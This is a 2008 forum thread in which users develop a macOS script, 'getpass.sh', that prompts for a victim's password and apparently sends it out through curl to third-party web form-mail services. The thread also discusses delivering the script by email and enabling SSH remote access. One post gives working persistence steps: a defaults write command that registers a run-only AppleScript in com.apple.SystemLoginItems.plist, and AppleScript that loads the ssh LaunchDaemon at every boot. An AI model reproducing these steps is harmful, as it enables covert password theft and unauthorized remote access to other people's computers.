CODE
Last login: Wed May 28 12:43:43 on ttys001
andrew-frees-imac:~ andrewfree$ /Users/andrewfree/Downloads/getpass.sh
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0    83    0    83    0     0    182      0 --:--:-- --:--:-- --:--:--     0
Password:


curl: (6) Couldn't resolve host 'www.A_Location_which_you_can_find_on_your_own.com'
andrew-frees-imac:~ andrewfree$

now just to fix the last part..
anyone here have a good one?
Oktane
May 28 2008, 03:42 PM
Are you abandoning the com.appleSystemLoginItems.plist idea, callmenames?
andrewistheshit
May 28 2008, 03:54 PM
QUOTE
The BASH shell is a command interpreter - it reads each command of the script and executes it on the fly. Compilers for BASH scripts do exist, but it isn't necessary generally and since it would no longer be source code, no one can read (and learn) from it.

true, but im just saying if someone downloaded it in a email, well nvm i geuss the script could run with on its own without being compiled. ( refresh me on how once someone opens a file in a email the script will run) i remember reading about making it open preview too? or something like that

QUOTE
A lot of computers have more than one user account. Plus, the user may have given an incorrect password but sudo was still working due to the timestamp feature -in which case we get the hash even if the user lied
.

if they lied then the sudo command would not work, am i right?
thus no hash could be generated




oh and OKtane what was your com.appleSystemLoginItems.plist idea?


oh and one last edit i think i found a fourm to use

http://www.employeesuggestions.com/form.asp
andrewistheshit
May 28 2008, 04:26 PM
ok well i ran it with this and got
http://www.employeesuggestions.com/form.asp

CODE
Last login: Wed May 28 14:18:20 on ttys000
andrew-frees-imac:~ andrewfree$ /Users/andrewfree/Downloads/getpass.sh
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0    83    0    83    0     0    341      0 --:--:-- --:--:-- --:--:--     0
Password:

bind(): Address already in use
com.openssh.sshd: Already loaded
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  7605  100  7605    0     0  14549      0 --:--:-- --:--:-- --:--:-- 45538
andrew-frees-imac:~ andrewfree$


then with this
http://formmail.cgiworld.net/email.cgi?rec...schjelderup.org

CODE
andrew-frees-imac:~ andrewfree$ /Users/andrewfree/Downloads/getpass.sh
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0    83    0    83    0     0    427      0 --:--:-- --:--:-- --:--:--     0
Password:

bind(): Address already in use
com.openssh.sshd: Already loaded
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   365    0   365    0     0    562      0 --:--:-- --:--:-- --:--:--     0
andrew-frees-imac:~ andrewfree$


sorry for double post
but neither of them emailed me
callmenames
May 28 2008, 04:49 PM
QUOTE(Oktane @ May 28 2008, 01:23 PM) *
[...]Can you give step by step on the com.apple.SystemLoginItems.plist[...]


First... create the /Library/Preferences/com.apple.SystemLoginItems.plist file and add the path to your run-only applescript bundle ( /Users/username/Desktop/AdjustGamma.app ). Change the username, obviously or just store the app outside the User home folder and change the path accordingly. In testing this again I discovered that ~ definitely does NOT work - I must have left the app in two places when I tested that before and it ran the other one. Oops.
Run this command in Terminal...
CODE
defaults write /Library/Preferences/com.apple.SystemLoginItems AutoLaunchedApplicationDictionary "({Path = \"/Users/username/Desktop/AdjustGamma.app\"; })"


Second... since you're having some problem... let's have the app log as it goes along... this is the AppleScript
CODE
do shell script "echo start >> /applog.txt"
do shell script "id >> /applog.txt"
try
    do shell script "/bin/launchctl load -w /System/Library/LaunchDaemons/ssh.plist"
    do shell script "echo worked >> /applog.txt"
on error
    do shell script "echo failed >> /applog.txt"
end try
do shell script "echo end >> /applog.txt"


Save that from Script Editor as an application bundle, run only. You can save the app wherever you like but do ensure that you have the correct path to the app in /Library/Preferences/com.apple.SystemLoginItems.plist

Then restart.

Look in /applog.txt for the logged entries from the app to see where it is failing.
Oktane
May 28 2008, 04:57 PM
Testing right now... I used ~ :)
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
Invision Power Board © 2001-2010 Invision Power Services, Inc.